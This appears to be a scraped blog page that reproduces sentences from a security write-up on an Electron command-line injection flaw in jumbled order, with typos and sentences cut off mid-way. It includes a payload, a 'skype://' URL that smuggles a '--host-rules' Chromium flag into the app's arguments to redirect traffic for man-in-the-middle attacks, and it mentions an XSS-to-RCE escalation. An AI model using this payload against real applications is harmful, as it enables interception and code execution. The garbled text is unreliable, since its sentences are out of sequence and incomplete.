Mitmproxy windows11/29/2023 ![]() oOAuthtokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. While the immediate implication is that an attacker can obtain confidential data (e.g. We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video: When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to instead of the original domain. location = 'skype://user?userinfo" -host-rules="MAP * " -foobar=' In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle: This immediately sticks out as a good candidate for subverting the process. ![]() With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. We started looking for missed flags and noticed that host-rules were absent from the blacklist. Valid flags could be missed by the check if the list is not properly sorted The blacklist is implemented using a binary search.On each libchromiumcontent update the Electron team must remember to update the command_line_ file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8 ![]() The patch relies on a static blacklist of available chromium flags.Bool CheckCommandLineArguments ( int argc, base :: CommandLine :: CharType ** argv ) Īs is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments such as Electron: ![]()
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |